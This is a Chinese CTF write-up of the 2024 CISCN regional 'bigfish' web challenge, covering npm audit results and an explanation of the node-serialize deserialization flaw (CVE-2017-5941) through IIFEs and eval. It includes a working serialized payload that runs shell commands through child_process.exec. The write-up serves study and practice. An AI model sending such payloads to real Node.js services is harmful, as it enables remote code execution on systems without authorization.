从 2024CISCN华东南决赛bigfish看nodejs反序列化(CVE-2017-5941)

可惜不是联网环境 很简单的cve 简单学习下

赛后拿到附件先着手开始分析

先把相关的依赖全部装上

1
npm install

image-20240630195210990

刚刚装好就看到好多漏洞了 不少高危的 拿npm audit审计一下依赖看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
PS D:\Desktop\2024-CISCN-华东南-web\Web-bigfish> npm audit
# npm audit report

express-jwt  <=7.7.7 || 8.3.0
Severity: high
Authorization bypass in express-jwt - https://github.com/advisories/GHSA-6g6m-m6h5-w9gf
Depends on vulnerable versions of jsonwebtoken
Depends on vulnerable versions of lodash.set
fix available via `npm audit fix --force`
Will install express-jwt@8.4.1, which is a breaking change
node_modules/express-jwt

hoek  *
Severity: high
Prototype Pollution in hoek - https://github.com/advisories/GHSA-jp4x-w63m-7wgm
hoek subject to prototype pollution via the clone function. - https://github.com/advisories/GHSA-c429-5p7v-vgjp
fix available via `npm audit fix --force`
Will install jsonwebtoken@9.0.2, which is a breaking change
node_modules/hoek
  joi  0.0.2 - 8.0.5
  Depends on vulnerable versions of hoek
  Depends on vulnerable versions of topo
  node_modules/joi
    jsonwebtoken  <=8.5.1
    Depends on vulnerable versions of joi
    node_modules/express-jwt/node_modules/jsonwebtoken
    node_modules/jsonwebtoken
  topo  <=2.0.0
  Depends on vulnerable versions of hoek
  node_modules/topo

html-minifier  *
Severity: high
kangax html-minifier REDoS vulnerability - https://github.com/advisories/GHSA-pfq8-rq6v-vf5m
fix available via `npm audit fix --force`
Will install art-template@4.1.0, which is a breaking change
node_modules/html-minifier
  art-template  >=4.2.0
  Depends on vulnerable versions of html-minifier
  node_modules/art-template


lodash  <=4.17.20
Severity: critical
Regular Expression Denial of Service (ReDoS) in lodash - https://github.com/advisories/GHSA-x5rq-j2xg-h7qm
Prototype Pollution in lodash - https://github.com/advisories/GHSA-4xc9-xhrj-v574
Regular Expression Denial of Service (ReDoS) in lodash - https://github.com/advisories/GHSA-29mw-wpgm-hmr9
Prototype Pollution in lodash - https://github.com/advisories/GHSA-p6mc-m468-83gw
Command Injection in lodash - https://github.com/advisories/GHSA-35jh-r3h4-6jhm
Prototype Pollution in lodash - https://github.com/advisories/GHSA-fvqr-27wr-82fm
Prototype Pollution in lodash - https://github.com/advisories/GHSA-jf85-cpcp-j695
No fix available
node_modules/lodash
  xmlbuilder  2.5.0 - 4.2.0
  Depends on vulnerable versions of lodash
  node_modules/xmlbuilder
    plist  <=3.0.4
    Depends on vulnerable versions of xmlbuilder
    Depends on vulnerable versions of xmldom
    node_modules/plist
      chrome  *
      Depends on vulnerable versions of plist
      node_modules/chrome

lodash.set  *
Severity: high
Prototype Pollution in lodash - https://github.com/advisories/GHSA-p6mc-m468-83gw
fix available via `npm audit fix --force`
Will install express-jwt@8.4.1, which is a breaking change
node_modules/lodash.set

node-serialize  *
Severity: critical
Code Execution through IIFE in node-serialize - https://github.com/advisories/GHSA-q4v7-4rhw-9hqm
No fix available
node_modules/node-serialize


xmldom  *
Severity: critical
Misinterpretation of malicious XML input - https://github.com/advisories/GHSA-h6q6-9hqw-rwfv
xmldom allows multiple root nodes in a DOM - https://github.com/advisories/GHSA-crh6-fp67-6883
Misinterpretation of malicious XML input - https://github.com/advisories/GHSA-5fg8-2547-mr8q
No fix available
node_modules/xmldom

14 vulnerabilities (9 high, 5 critical)

To address all issues possible (including breaking changes), run:
  npm audit fix --force

Some issues need review, and may require choosing
a different dependency.

注意到这里的node-serialize版本为0.0.4 存在(CVE-2017-5941)

IIFE表达式

立即调用函数表达式 - MDN Web 文档术语表:Web 相关术语的定义 | MDN (mozilla.org)

翻了翻相关的文档 这个表达式就是通过构建一个匿名函数,然后把这个匿名函数相关的内容都用()包裹起来 最后立刻添加上一个()

也就是立即执行函数表达式 ,这样js就会立刻执行这个函数

1
2
3
(function(){ /* code */ }());
// 或者
(function(){ /* code */ })();

假设有这样一个函数

1
(function(){console.log("1212")})()

image-20240630201345596

运行后立刻就会调用自己的函数 输出相关内容

漏洞exp

1
2
3
4
5
6
7
serialize = require('node-serialize');
var test = {
 rce : function(){require('child_process').exec('ls /',function(error, stdout, stderr){console.log(stdout)});},
}
var payload = serialize.serialize(test)
payload="{\"rce\":\"_$$ND_FUNC$$_function(){require('child_process').exec('calc',function(error, stdout, stderr){console.log(stdout)});}()\"}"
serialize.unserialize(payload);

调试一下漏洞代码

image-20240630202808611

先吧json里面的东西解析出来 判断一些键值之类的

重点在这一部分

1
obj[key] = eval('(' + obj[key].substring(FUNCFLAG.length) + ')');

此时obj[key]的内容是我们的payload

image-20240630203329874

然后截取了FUNCFLAG的长度 把这一串字符串给去掉了

构造出字符串

1
"(function(){require('child_process').exec('calc',function(error, stdout, stderr){console.log(stdout)});}())"

交给eval执行 由于是自执行表达式 于是就造成了注入

image-20240630203629776

解题

image-20240630204119633

在这个路由存在很明显的反序列化 直接打就行